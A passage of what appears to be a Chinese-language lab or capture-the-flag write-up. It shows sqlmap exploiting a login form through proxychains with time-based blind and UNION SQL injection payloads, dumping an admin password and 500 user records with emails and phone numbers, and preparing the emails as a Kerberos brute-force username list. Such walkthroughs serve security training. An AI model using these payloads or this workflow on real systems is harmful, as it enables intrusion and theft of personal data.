Parameter: password (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: password=123' AND (SELECT 4599 FROM (SELECT(SLEEP(5)))dclH) AND 'mSzJ'='mSzJ&username=admin

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: password=123' UNION ALL SELECT NULL,CONCAT(0x71626a6b71,0x774e6565764e756b626f6c73465a6a5a6b4a79504f6e7752656c6e5458446a6e6951476675426455,0x716a787871),NULL-- -&username=admin
---
[17:45:32] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 19.10 or 20.04 or 20.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[17:45:32] [INFO] fetching columns for table 'oa_admin' in database 'oa_db'
[17:45:32] [INFO] fetching entries for table 'oa_admin' in database 'oa_db'
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  OK
 ...  172.22.6.38:80  ...  OK
Database: oa_db
Table: oa_admin
[1 entry]
+----+------------------+---------------+
| id | password         | username      |
+----+------------------+---------------+
| 1  | bo2y8kAL3HnXUiQo | administrator |
+----+------------------+---------------+

[17:45:32] [INFO] table 'oa_db.oa_admin' dumped to CSV file '/root/.local/share/sqlmap/output/172.22.6.38/dump/oa_db/oa_admin.csv'
[17:45:32] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.22.6.38'

[*] ending @ 17:45:32 /2025-11-16/

                                                                                                                                        
┌──(root㉿kali)-[/home/kali]
└─# proxychains sqlmap -r test.txt -D oa_db -T oa_users --dump
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
        ___
       __H__                                                                                                                            
 ___ ___[.]_____ ___ ___  {1.9.8#stable}                                                                                                
|_ -| . ["]     | .'| . |                                                                                                               
|___|_  [,]_|_|_|__,|  _|                                                                                                               
      |_|V...       |_|   https://sqlmap.org                                                                                            

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:45:55 /2025-11-16/

[17:45:55] [INFO] parsing HTTP request from 'test.txt'
[17:45:55] [INFO] resuming back-end DBMS 'mysql' 
[17:45:55] [INFO] testing connection to the target URL
[proxychains] Strict chain  ...  38.55.99.185:1123 [proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.6.38:80  ...  172.22.6.38:80  ...  OK
 ...  OK
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: password (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: password=123' AND (SELECT 4599 FROM (SELECT(SLEEP(5)))dclH) AND 'mSzJ'='mSzJ&username=admin

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: password=123' UNION ALL SELECT NULL,CONCAT(0x71626a6b71,0x774e6565764e756b626f6c73465a6a5a6b4a79504f6e7752656c6e5458446a6e6951476675426455,0x716a787871),NULL-- -&username=admin
---
[17:45:55] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 19.10 or 20.10 or 20.04 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[17:45:55] [INFO] fetching columns for table 'oa_users' in database 'oa_db'
[17:45:55] [INFO] fetching entries for table 'oa_users' in database 'oa_db'
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  OK
 ...  172.22.6.38:80  ...  OK
Database: oa_db
Table: oa_users
[500 entries]
+-----+----------------------------+-------------+-----------------+
| id  | email                      | phone       | username        |
+-----+----------------------------+-------------+-----------------+
[17:45:56] [WARNING] console output will be trimmed to last 256 rows due to large table size
| 245 | chenyan@xiaorang.lab       | 18281528743 | CHEN YAN        |
| 246 | tanggui@xiaorang.lab       | 18060615547 | TANG GUI        |
| 247 | buning@xiaorang.lab        | 13046481392 | BU NING         |
| 248 | beishu@xiaorang.lab        | 18268508400 | BEI SHU         |
| 249 | shushi@xiaorang.lab        | 17770383196 | SHU SHI         |
| 250 | fuyi@xiaorang.lab          | 18902082658 | FU YI           |
| 251 | pangcheng@xiaorang.lab     | 18823789530 | PANG CHENG      |
| 252 | tonghao@xiaorang.lab       | 13370873526 | TONG HAO        |
| 253 | jiaoshan@xiaorang.lab      | 15375905173 | JIAO SHAN       |
| 254 | dulun@xiaorang.lab         | 13352331157 | DU LUN          |
| 255 | kejuan@xiaorang.lab        | 13222550481 | KE JUAN         |
| 256 | gexin@xiaorang.lab         | 18181553086 | GE XIN          |
| 257 | lugu@xiaorang.lab          | 18793883130 | LU GU           |
| 258 | guzaicheng@xiaorang.lab    | 15309377043 | GU ZAI CHENG    |
| 259 | feicai@xiaorang.lab        | 13077435367 | FEI CAI         |
| 260 | ranqun@xiaorang.lab        | 18239164662 | RAN QUN         |
| 261 | zhouyi@xiaorang.lab        | 13169264671 | ZHOU YI         |
| 262 | shishu@xiaorang.lab        | 18592890189 | SHI SHU         |
| 263 | yanyun@xiaorang.lab        | 15071085768 | YAN YUN         |
| 264 | chengqiu@xiaorang.lab      | 13370162980 | CHENG QIU       |
| 265 | louyou@xiaorang.lab        | 13593582379 | LOU YOU         |
| 266 | maqun@xiaorang.lab         | 15235945624 | MA QUN          |
| 267 | wenbiao@xiaorang.lab       | 13620643639 | WEN BIAO        |
| 268 | weishengshan@xiaorang.lab  | 18670502260 | WEI SHENG SHAN  |
| 269 | zhangxin@xiaorang.lab      | 15763185760 | ZHANG XIN       |
| 270 | chuyuan@xiaorang.lab       | 18420545268 | CHU YUAN        |
| 271 | wenliang@xiaorang.lab      | 13601678032 | WEN LIANG       |
| 272 | yulvxue@xiaorang.lab       | 18304374901 | YU LV XUE       |
| 273 | luyue@xiaorang.lab         | 18299785575 | LU YUE          |
| 274 | ganjian@xiaorang.lab       | 18906111021 | GAN JIAN        |
| 275 | pangzhen@xiaorang.lab      | 13479328562 | PANG ZHEN       |
| 276 | guohong@xiaorang.lab       | 18510220597 | GUO HONG        |
| 277 | lezhong@xiaorang.lab       | 15320909285 | LE ZHONG        |
| 278 | sheweiyue@xiaorang.lab     | 13736399596 | SHE WEI YUE     |
| 279 | dujian@xiaorang.lab        | 15058892639 | DU JIAN         |
| 280 | lidongjin@xiaorang.lab     | 18447207007 | LI DONG JIN     |
| 281 | hongqun@xiaorang.lab       | 15858462251 | HONG QUN        |
| 282 | yexing@xiaorang.lab        | 13719043564 | YE XING         |
| 283 | maoda@xiaorang.lab         | 13878840690 | MAO DA          |
| 284 | qiaomei@xiaorang.lab       | 13053207462 | QIAO MEI        |
| 285 | nongzhen@xiaorang.lab      | 15227699960 | NONG ZHEN       |
| 286 | dongshu@xiaorang.lab       | 15695562947 | DONG SHU        |
| 287 | zhuzhu@xiaorang.lab        | 13070163385 | ZHU ZHU         |
| 288 | jiyun@xiaorang.lab         | 13987332999 | JI YUN          |
| 289 | qiguanrou@xiaorang.lab     | 15605983582 | QI GUAN ROU     |
| 290 | yixue@xiaorang.lab         | 18451603140 | YI XUE          |
| 291 | chujun@xiaorang.lab        | 15854942459 | CHU JUN         |
| 292 | shenshan@xiaorang.lab      | 17712052191 | SHEN SHAN       |
| 293 | lefen@xiaorang.lab         | 13271196544 | LE FEN          |
| 294 | yubo@xiaorang.lab          | 13462202742 | YU BO           |
| 295 | helianrui@xiaorang.lab     | 15383000907 | HE LIAN RUI     |
| 296 | xuanqun@xiaorang.lab       | 18843916267 | XUAN QUN        |
| 297 | shangjun@xiaorang.lab      | 15162486698 | SHANG JUN       |
| 298 | huguang@xiaorang.lab       | 18100586324 | HU GUANG        |
| 299 | wansifu@xiaorang.lab       | 18494761349 | WAN SI FU       |
| 300 | fenghong@xiaorang.lab      | 13536727314 | FENG HONG       |
| 301 | wanyan@xiaorang.lab        | 17890844429 | WAN YAN         |
| 302 | diyan@xiaorang.lab         | 18534028047 | DI YAN          |
| 303 | xiangyu@xiaorang.lab       | 13834043047 | XIANG YU        |
| 304 | songyan@xiaorang.lab       | 15282433280 | SONG YAN        |
| 305 | fandi@xiaorang.lab         | 15846960039 | FAN DI          |
| 306 | xiangjuan@xiaorang.lab     | 18120327434 | XIANG JUAN      |
| 307 | beirui@xiaorang.lab        | 18908661803 | BEI RUI         |
| 308 | didi@xiaorang.lab          | 13413041463 | DI DI           |
| 309 | zhubin@xiaorang.lab        | 15909558554 | ZHU BIN         |
| 310 | lingchun@xiaorang.lab      | 13022790678 | LING CHUN       |
| 311 | zhenglu@xiaorang.lab       | 13248244873 | ZHENG LU        |
| 312 | xundi@xiaorang.lab         | 18358493414 | XUN DI          |
| 313 | wansishun@xiaorang.lab     | 18985028319 | WAN SI SHUN     |
| 314 | yezongyue@xiaorang.lab     | 13866302416 | YE ZONG YUE     |
| 315 | bianmei@xiaorang.lab       | 18540879992 | BIAN MEI        |
| 316 | shanshao@xiaorang.lab      | 18791488918 | SHAN SHAO       |
| 317 | zhenhui@xiaorang.lab       | 13736784817 | ZHEN HUI        |
| 318 | chengli@xiaorang.lab       | 15913267394 | CHENG LI        |
| 319 | yufen@xiaorang.lab         | 18432795588 | YU FEN          |
| 320 | jiyi@xiaorang.lab          | 13574211454 | JI YI           |
| 321 | panbao@xiaorang.lab        | 13675851303 | PAN BAO         |
| 322 | mennane@xiaorang.lab       | 15629706208 | MEN NAN E       |
| 323 | fengsi@xiaorang.lab        | 13333432577 | FENG SI         |
| 324 | mingyan@xiaorang.lab       | 18296909463 | MING YAN        |
| 325 | luoyou@xiaorang.lab        | 15759321415 | LUO YOU         |
| 326 | liangduanqing@xiaorang.lab | 13150744785 | LIANG DUAN QING |
| 327 | nongyan@xiaorang.lab       | 18097386975 | NONG YAN        |
| 328 | haolun@xiaorang.lab        | 15152700465 | HAO LUN         |
| 329 | oulun@xiaorang.lab         | 13402760696 | OU LUN          |
| 330 | weichipeng@xiaorang.lab    | 18057058937 | WEI CHI PENG    |
| 331 | qidiaofang@xiaorang.lab    | 18728297829 | QI DIAO FANG    |
| 332 | xuehe@xiaorang.lab         | 13398862169 | XUE HE          |
| 333 | chensi@xiaorang.lab        | 18030178713 | CHEN SI         |
| 334 | guihui@xiaorang.lab        | 17882514129 | GUI HUI         |
| 335 | fuyue@xiaorang.lab         | 18298436549 | FU YUE          |
| 336 | wangxing@xiaorang.lab      | 17763645267 | WANG XING       |
| 337 | zhengxiao@xiaorang.lab     | 18673968392 | ZHENG XIAO      |
| 338 | guhui@xiaorang.lab         | 15166711352 | GU HUI          |
| 339 | baoai@xiaorang.lab         | 15837430827 | BAO AI          |
| 340 | hangzhao@xiaorang.lab      | 13235488232 | HANG ZHAO       |
| 341 | xingye@xiaorang.lab        | 13367587521 | XING YE         |
| 342 | qianyi@xiaorang.lab        | 18657807767 | QIAN YI         |
| 343 | xionghong@xiaorang.lab     | 17725874584 | XIONG HONG      |
| 344 | zouqi@xiaorang.lab         | 15300430128 | ZOU QI          |
| 345 | rongbiao@xiaorang.lab      | 13034242682 | RONG BIAO       |
| 346 | gongxin@xiaorang.lab       | 15595839880 | GONG XIN        |
| 347 | luxing@xiaorang.lab        | 18318675030 | LU XING         |
| 348 | huayan@xiaorang.lab        | 13011805354 | HUA YAN         |
| 349 | duyue@xiaorang.lab         | 15515878208 | DU YUE          |
| 350 | xijun@xiaorang.lab         | 17871583183 | XI JUN          |
| 351 | daiqing@xiaorang.lab       | 18033226216 | DAI QING        |
| 352 | yingbiao@xiaorang.lab      | 18633421863 | YING BIAO       |
| 353 | hengteng@xiaorang.lab      | 15956780740 | HENG TENG       |
| 354 | changwu@xiaorang.lab       | 15251485251 | CHANG WU        |
| 355 | chengying@xiaorang.lab     | 18788248715 | CHENG YING      |
| 356 | luhong@xiaorang.lab        | 17766091079 | LU HONG         |
| 357 | tongxue@xiaorang.lab       | 18466102780 | TONG XUE        |
| 358 | xiangqian@xiaorang.lab     | 13279611385 | XIANG QIAN      |
| 359 | shaokang@xiaorang.lab      | 18042645434 | SHAO KANG       |
| 360 | nongzhu@xiaorang.lab       | 13934236634 | NONG ZHU        |
| 361 | haomei@xiaorang.lab        | 13406913218 | HAO MEI         |
| 362 | maoqing@xiaorang.lab       | 15713298425 | MAO QING        |
| 363 | xiai@xiaorang.lab          | 18148404789 | XI AI           |
| 364 | bihe@xiaorang.lab          | 13628593791 | BI HE           |
| 365 | gaoli@xiaorang.lab         | 15814408188 | GAO LI          |
| 366 | jianggong@xiaorang.lab     | 15951118926 | JIANG GONG      |
| 367 | pangning@xiaorang.lab      | 13443921700 | PANG NING       |
| 368 | ruishi@xiaorang.lab        | 15803112819 | RUI SHI         |
| 369 | wuhuan@xiaorang.lab        | 13646953078 | WU HUAN         |
| 370 | qiaode@xiaorang.lab        | 13543564200 | QIAO DE         |
| 371 | mayong@xiaorang.lab        | 15622971484 | MA YONG         |
| 372 | hangda@xiaorang.lab        | 15937701659 | HANG DA         |
| 373 | changlu@xiaorang.lab       | 13734991654 | CHANG LU        |
| 374 | liuyuan@xiaorang.lab       | 15862054540 | LIU YUAN        |
| 375 | chenggu@xiaorang.lab       | 15706685526 | CHENG GU        |
| 376 | shentuyun@xiaorang.lab     | 15816902379 | SHEN TU YUN     |
| 377 | zhuangsong@xiaorang.lab    | 17810274262 | ZHUANG SONG     |
| 378 | chushao@xiaorang.lab       | 18822001640 | CHU SHAO        |
| 379 | heli@xiaorang.lab          | 13701347081 | HE LI           |
| 380 | haoming@xiaorang.lab       | 15049615282 | HAO MING        |
| 381 | xieyi@xiaorang.lab         | 17840660107 | XIE YI          |
| 382 | shangjie@xiaorang.lab      | 15025010410 | SHANG JIE       |
| 383 | situxin@xiaorang.lab       | 18999728941 | SI TU XIN       |
| 384 | linxi@xiaorang.lab         | 18052976097 | LIN XI          |
| 385 | zoufu@xiaorang.lab         | 15264535633 | ZOU FU          |
| 386 | qianqing@xiaorang.lab      | 18668594658 | QIAN QING       |
| 387 | qiai@xiaorang.lab          | 18154690198 | QI AI           |
| 388 | ruilin@xiaorang.lab        | 13654483014 | RUI LIN         |
| 389 | luomeng@xiaorang.lab       | 15867095032 | LUO MENG        |
| 390 | huaren@xiaorang.lab        | 13307653720 | HUA REN         |
| 391 | yanyangmei@xiaorang.lab    | 15514015453 | YAN YANG MEI    |
| 392 | zuofen@xiaorang.lab        | 15937087078 | ZUO FEN         |
| 393 | manyuan@xiaorang.lab       | 18316106061 | MAN YUAN        |
| 394 | yuhui@xiaorang.lab         | 18058257228 | YU HUI          |
| 395 | sunli@xiaorang.lab         | 18233801124 | SUN LI          |
| 396 | guansixin@xiaorang.lab     | 13607387740 | GUAN SI XIN     |
| 397 | ruisong@xiaorang.lab       | 13306021674 | RUI SONG        |
| 398 | qiruo@xiaorang.lab         | 13257810331 | QI RUO          |
| 399 | jinyu@xiaorang.lab         | 18565922652 | JIN YU          |
| 400 | shoujuan@xiaorang.lab      | 18512174415 | SHOU JUAN       |
| 401 | yanqian@xiaorang.lab       | 13799789435 | YAN QIAN        |
| 402 | changyun@xiaorang.lab      | 18925015029 | CHANG YUN       |
| 403 | hualu@xiaorang.lab         | 13641470801 | HUA LU          |
| 404 | huanming@xiaorang.lab      | 15903282860 | HUAN MING       |
| 405 | baoshao@xiaorang.lab       | 13795275611 | BAO SHAO        |
| 406 | hongmei@xiaorang.lab       | 13243605925 | HONG MEI        |
| 407 | manyun@xiaorang.lab        | 13238107359 | MAN YUN         |
| 408 | changwan@xiaorang.lab      | 13642205622 | CHANG WAN       |
| 409 | wangyan@xiaorang.lab       | 13242486231 | WANG YAN        |
| 410 | shijian@xiaorang.lab       | 15515077573 | SHI JIAN        |
| 411 | ruibei@xiaorang.lab        | 18157706586 | RUI BEI         |
| 412 | jingshao@xiaorang.lab      | 18858376544 | JING SHAO       |
| 413 | jinzhi@xiaorang.lab        | 18902437082 | JIN ZHI         |
| 414 | yuhui@xiaorang.lab         | 15215599294 | YU HUI          |
| 415 | zangpeng@xiaorang.lab      | 18567574150 | ZANG PENG       |
| 416 | changyun@xiaorang.lab      | 15804640736 | CHANG YUN       |
| 417 | yetai@xiaorang.lab         | 13400150018 | YE TAI          |
| 418 | luoxue@xiaorang.lab        | 18962643265 | LUO XUE         |
| 419 | moqian@xiaorang.lab        | 18042706956 | MO QIAN         |
| 420 | xupeng@xiaorang.lab        | 15881934759 | XU PENG         |
| 421 | ruanyong@xiaorang.lab      | 15049703903 | RUAN YONG       |
| 422 | guliangxian@xiaorang.lab   | 18674282714 | GU LIANG XIAN   |
| 423 | yinbin@xiaorang.lab        | 15734030492 | YIN BIN         |
| 424 | huarui@xiaorang.lab        | 17699257041 | HUA RUI         |
| 425 | niuya@xiaorang.lab         | 13915041589 | NIU YA          |
| 426 | guwei@xiaorang.lab         | 13584571917 | GU WEI          |
| 427 | qinguan@xiaorang.lab       | 18427953434 | QIN GUAN        |
| 428 | yangdanhan@xiaorang.lab    | 15215900100 | YANG DAN HAN    |
| 429 | yingjun@xiaorang.lab       | 13383367818 | YING JUN        |
| 430 | weiwan@xiaorang.lab        | 13132069353 | WEI WAN         |
| 431 | sunduangu@xiaorang.lab     | 15737981701 | SUN DUAN GU     |
| 432 | sisiwu@xiaorang.lab        | 18021600640 | SI SI WU        |
| 433 | nongyan@xiaorang.lab       | 13312613990 | NONG YAN        |
| 434 | xuanlu@xiaorang.lab        | 13005748230 | XUAN LU         |
| 435 | yunzhong@xiaorang.lab      | 15326746780 | YUN ZHONG       |
| 436 | gengfei@xiaorang.lab       | 13905027813 | GENG FEI        |
| 437 | zizhuansong@xiaorang.lab   | 13159301262 | ZI ZHUAN SONG   |
| 438 | ganbailong@xiaorang.lab    | 18353612904 | GAN BAI LONG    |
| 439 | shenjiao@xiaorang.lab      | 15164719751 | SHEN JIAO       |
| 440 | zangyao@xiaorang.lab       | 18707028470 | ZANG YAO        |
| 441 | yangdanhe@xiaorang.lab     | 18684281105 | YANG DAN HE     |
| 442 | chengliang@xiaorang.lab    | 13314617161 | CHENG LIANG     |
| 443 | xudi@xiaorang.lab          | 18498838233 | XU DI           |
| 444 | wulun@xiaorang.lab         | 18350490780 | WU LUN          |
| 445 | yuling@xiaorang.lab        | 18835870616 | YU LING         |
| 446 | taoya@xiaorang.lab         | 18494928860 | TAO YA          |
| 447 | jinle@xiaorang.lab         | 15329208123 | JIN LE          |
| 448 | youchao@xiaorang.lab       | 13332964189 | YOU CHAO        |
| 449 | liangduanzhi@xiaorang.lab  | 15675237494 | LIANG DUAN ZHI  |
| 450 | jiagupiao@xiaorang.lab     | 17884962455 | JIA GU PIAO     |
| 451 | ganze@xiaorang.lab         | 17753508925 | GAN ZE          |
| 452 | jiangqing@xiaorang.lab     | 15802357200 | JIANG QING      |
| 453 | jinshan@xiaorang.lab       | 13831466303 | JIN SHAN        |
| 454 | zhengpubei@xiaorang.lab    | 13690156563 | ZHENG PU BEI    |
| 455 | cuicheng@xiaorang.lab      | 17641589842 | CUI CHENG       |
| 456 | qiyong@xiaorang.lab        | 13485427829 | QI YONG         |
| 457 | qizhu@xiaorang.lab         | 18838859844 | QI ZHU          |
| 458 | ganjian@xiaorang.lab       | 18092585003 | GAN JIAN        |
| 459 | yurui@xiaorang.lab         | 15764121637 | YU RUI          |
| 460 | feishu@xiaorang.lab        | 18471512248 | FEI SHU         |
| 461 | chenxin@xiaorang.lab       | 13906545512 | CHEN XIN        |
| 462 | shengzhe@xiaorang.lab      | 18936457394 | SHENG ZHE       |
| 463 | wohong@xiaorang.lab        | 18404022650 | WO HONG         |
| 464 | manzhi@xiaorang.lab        | 15973350408 | MAN ZHI         |
| 465 | xiangdong@xiaorang.lab     | 13233908989 | XIANG DONG      |
| 466 | weihui@xiaorang.lab        | 15035834945 | WEI HUI         |
| 467 | xingquan@xiaorang.lab      | 18304752969 | XING QUAN       |
| 468 | miaoshu@xiaorang.lab       | 15121570939 | MIAO SHU        |
| 469 | gongwan@xiaorang.lab       | 18233990398 | GONG WAN        |
| 470 | qijie@xiaorang.lab         | 15631483536 | QI JIE          |
| 471 | shaoting@xiaorang.lab      | 15971628914 | SHAO TING       |
| 472 | xiqi@xiaorang.lab          | 18938747522 | XI QI           |
| 473 | jinghong@xiaorang.lab      | 18168293686 | JING HONG       |
| 474 | qianyou@xiaorang.lab       | 18841322688 | QIAN YOU        |
| 475 | chuhua@xiaorang.lab        | 15819380754 | CHU HUA         |
| 476 | yanyue@xiaorang.lab        | 18702474361 | YAN YUE         |
| 477 | huangjia@xiaorang.lab      | 13006878166 | HUANG JIA       |
| 478 | zhouchun@xiaorang.lab      | 13545820679 | ZHOU CHUN       |
| 479 | jiyu@xiaorang.lab          | 18650881187 | JI YU           |
| 480 | wendong@xiaorang.lab       | 17815264093 | WEN DONG        |
| 481 | heyuan@xiaorang.lab        | 18710821773 | HE YUAN         |
| 482 | mazhen@xiaorang.lab        | 18698248638 | MA ZHEN         |
| 483 | shouchun@xiaorang.lab      | 15241369178 | SHOU CHUN       |
| 484 | liuzhe@xiaorang.lab        | 18530936084 | LIU ZHE         |
| 485 | fengbo@xiaorang.lab        | 15812110254 | FENG BO         |
| 486 | taigongyuan@xiaorang.lab   | 15943349034 | TAI GONG YUAN   |
| 487 | gesheng@xiaorang.lab       | 18278508909 | GE SHENG        |
| 488 | songming@xiaorang.lab      | 13220512663 | SONG MING       |
| 489 | yuwan@xiaorang.lab         | 15505678035 | YU WAN          |
| 490 | diaowei@xiaorang.lab       | 13052582975 | DIAO WEI        |
| 491 | youyi@xiaorang.lab         | 18036808394 | YOU YI          |
| 492 | rongxianyu@xiaorang.lab    | 18839918955 | RONG XIAN YU    |
| 493 | fuyi@xiaorang.lab          | 15632151678 | FU YI           |
| 494 | linli@xiaorang.lab         | 17883399275 | LIN LI          |
| 495 | weixue@xiaorang.lab        | 18672465853 | WEI XUE         |
| 496 | hejuan@xiaorang.lab        | 13256081102 | HE JUAN         |
| 497 | zuoqiutai@xiaorang.lab     | 18093001354 | ZUO QIU TAI     |
| 498 | siyi@xiaorang.lab          | 17873307773 | SI YI           |
| 499 | shenshan@xiaorang.lab      | 18397560369 | SHEN SHAN       |
| 500 | tongdong@xiaorang.lab      | 15177549595 | TONG DONG       |
+-----+----------------------------+-------------+-----------------+

[17:45:56] [INFO] table 'oa_db.oa_users' dumped to CSV file '/root/.local/share/sqlmap/output/172.22.6.38/dump/oa_db/oa_users.csv'
[17:45:56] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.22.6.38'

[*] ending @ 17:45:56 /2025-11-16/

admin估计是当前机器用户，没啥用，users表里有大量都是以@xiaorang.lab结尾的用户，怀疑是域内用户

flag3

接下来要用Kerberos brute-force

把所有的email都提取出来

chenyan@xiaorang.lab
tanggui@xiaorang.lab
buning@xiaorang.lab
beishu@xiaorang.lab
shushi@xiaorang.lab
fuyi@xiaorang.lab
pangcheng@xiaorang.lab
tonghao@xiaorang.lab
jiaoshan@xiaorang.lab
dulun@xiaorang.lab
kejuan@xiaorang.lab
gexin@xiaorang.lab
lugu@xiaorang.lab
guzaicheng@xiaorang.lab
feicai@xiaorang.lab
ranqun@xiaorang.lab
zhouyi@xiaorang.lab
shishu@xiaorang.lab
yanyun@xiaorang.lab
chengqiu@xiaorang.lab
louyou@xiaorang.lab
maqun@xiaorang.lab
wenbiao@xiaorang.lab
weishengshan@xiaorang.lab
zhangxin@xiaorang.lab
chuyuan@xiaorang.lab
wenliang@xiaorang.lab
yulvxue@xiaorang.lab
luyue@xiaorang.lab
ganjian@xiaorang.lab
pangzhen@xiaorang.lab
guohong@xiaorang.lab
lezhong@xiaorang.lab
sheweiyue@xiaorang.lab
dujian@xiaorang.lab
lidongjin@xiaorang.lab
hongqun@xiaorang.lab
yexing@xiaorang.lab
maoda@xiaorang.lab
qiaomei@xiaorang.lab
nongzhen@xiaorang.lab
dongshu@xiaorang.lab
zhuzhu@xiaorang.lab
jiyun@xiaorang.lab
qiguanrou@xiaorang.lab
yixue@xiaorang.lab
chujun@xiaorang.lab
shenshan@xiaorang.lab
lefen@xiaorang.lab
yubo@xiaorang.lab
helianrui@xiaorang.lab
xuanqun@xiaorang.lab
shangjun@xiaorang.lab
huguang@xiaorang.lab
wansifu@xiaorang.lab
fenghong@xiaorang.lab
wanyan@xiaorang.lab
diyan@xiaorang.lab
xiangyu@xiaorang.lab
songyan@xiaorang.lab
fandi@xiaorang.lab
xiangjuan@xiaorang.lab
beirui@xiaorang.lab
didi@xiaorang.lab
zhubin@xiaorang.lab
lingchun@xiaorang.lab
zhenglu@xiaorang.lab
xundi@xiaorang.lab
wansishun@xiaorang.lab
yezongyue@xiaorang.lab
bianmei@xiaorang.lab
shanshao@xiaorang.lab
zhenhui@xiaorang.lab
chengli@xiaorang.lab
yufen@xiaorang.lab
jiyi@xiaorang.lab
panbao@xiaorang.lab
mennane@xiaorang.lab
fengsi@xiaorang.lab
mingyan@xiaorang.lab
luoyou@xiaorang.lab
liangduanqing@xiaorang.lab
nongyan@xiaorang.lab
haolun@xiaorang.lab
oulun@xiaorang.lab
weichipeng@xiaorang.lab
qidiaofang@xiaorang.lab
xuehe@xiaorang.lab
chensi@xiaorang.lab
guihui@xiaorang.lab
fuyue@xiaorang.lab
wangxing@xiaorang.lab
zhengxiao@xiaorang.lab
guhui@xiaorang.lab
baoai@xiaorang.lab
hangzhao@xiaorang.lab
xingye@xiaorang.lab
qianyi@xiaorang.lab
xionghong@xiaorang.lab
zouqi@xiaorang.lab
rongbiao@xiaorang.lab
gongxin@xiaorang.lab
luxing@xiaorang.lab
huayan@xiaorang.lab
duyue@xiaorang.lab
xijun@xiaorang.lab
daiqing@xiaorang.lab
yingbiao@xiaorang.lab
hengteng@xiaorang.lab
changwu@xiaorang.lab
chengying@xiaorang.lab
luhong@xiaorang.lab
tongxue@xiaorang.lab
xiangqian@xiaorang.lab
shaokang@xiaorang.lab
nongzhu@xiaorang.lab
haomei@xiaorang.lab
maoqing@xiaorang.lab
xiai@xiaorang.lab
bihe@xiaorang.lab
gaoli@xiaorang.lab
jianggong@xiaorang.lab
pangning@xiaorang.lab
ruishi@xiaorang.lab
wuhuan@xiaorang.lab
qiaode@xiaorang.lab
mayong@xiaorang.lab
hangda@xiaorang.lab
changlu@xiaorang.lab
liuyuan@xiaorang.lab
chenggu@xiaorang.lab
shentuyun@xiaorang.lab
zhuangsong@xiaorang.lab
chushao@xiaorang.lab
heli@xiaorang.lab
haoming@xiaorang.lab
xieyi@xiaorang.lab
shangjie@xiaorang.lab
situxin@xiaorang.lab
linxi@xiaorang.lab
zoufu@xiaorang.lab
qianqing@xiaorang.lab
qiai@xiaorang.lab
ruilin@xiaorang.lab
luomeng@xiaorang.lab
huaren@xiaorang.lab
yanyangmei@xiaorang.lab
zuofen@xiaorang.lab
manyuan@xiaorang.lab
yuhui@xiaorang.lab
sunli@xiaorang.lab
guansixin@xiaorang.lab
ruisong@xiaorang.lab
qiruo@xiaorang.lab
jinyu@xiaorang.lab
shoujuan@xiaorang.lab
yanqian@xiaorang.lab
changyun@xiaorang.lab
hualu@xiaorang.lab
huanming@xiaorang.lab
baoshao@xiaorang.lab
hongmei@xiaorang.lab
manyun@xiaorang.lab
changwan@xiaorang.lab
wangyan@xiaorang.lab
shijian@xiaorang.lab
ruibei@xiaorang.lab
jingshao@xiaorang.lab
jinzhi@xiaorang.lab
yuhui@xiaorang.lab
zangpeng@xiaorang.lab
changyun@xiaorang.lab
yetai@xiaorang.lab
luoxue@xiaorang.lab
moqian@xiaorang.lab
xupeng@xiaorang.lab
ruanyong@xiaorang.lab
guliangxian@xiaorang.lab
yinbin@xiaorang.lab
huarui@xiaorang.lab
niuya@xiaorang.lab
guwei@xiaorang.lab
qinguan@xiaorang.lab
yangdanhan@xiaorang.lab
yingjun@xiaorang.lab
weiwan@xiaorang.lab
sunduangu@xiaorang.lab
sisiwu@xiaorang.lab
nongyan@xiaorang.lab
xuanlu@xiaorang.lab
yunzhong@xiaorang.lab
gengfei@xiaorang.lab
zizhuansong@xiaorang.lab
ganbailong@xiaorang.lab
shenjiao@xiaorang.lab
zangyao@xiaorang.lab
yangdanhe@xiaorang.lab
chengliang@xiaorang.lab
xudi@xiaorang.lab
wulun@xiaorang.lab
yuling@xiaorang.lab
taoya@xiaorang.lab
jinle@xiaorang.lab
youchao@xiaorang.lab
liangduanzhi@xiaorang.lab
jiagupiao@xiaorang.lab
ganze@xiaorang.lab
jiangqing@xiaorang.lab
jinshan@xiaorang.lab
zhengpubei@xiaorang.lab
cuicheng@xiaorang.lab
qiyong@xiaorang.lab
qizhu@xiaorang.lab
ganjian@xiaorang.lab
yurui@xiaorang.lab
feishu@xiaorang.lab
chenxin@xiaorang.lab
shengzhe@xiaorang.lab
wohong@xiaorang.lab
manzhi@xiaorang.lab
xiangdong@xiaorang.lab
weihui@xiaorang.lab
xingquan@xiaorang.lab
miaoshu@xiaorang.lab
gongwan@xiaorang.lab
qijie@xiaorang.lab
shaoting@xiaorang.lab
xiqi@xiaorang.lab
jinghong@xiaorang.lab
qianyou@xiaorang.lab
chuhua@xiaorang.lab
yanyue@xiaorang.lab
huangjia@xiaorang.lab
zhouchun@xiaorang.lab
jiyu@xiaorang.lab
wendong@xiaorang.lab
heyuan@xiaorang.lab
mazhen@xiaorang.lab
shouchun@xiaorang.lab
liuzhe@xiaorang.lab
fengbo@xiaorang.lab
taigongyuan@xiaorang.lab
gesheng@xiaorang.lab
songming@xiaorang.lab
yuwan@xiaorang.lab
diaowei@xiaorang.lab
youyi@xiaorang.lab
rongxianyu@xiaorang.lab
fuyi@xiaorang.lab
linli@xiaorang.lab
weixue@xiaorang.lab
hejuan@xiaorang.lab
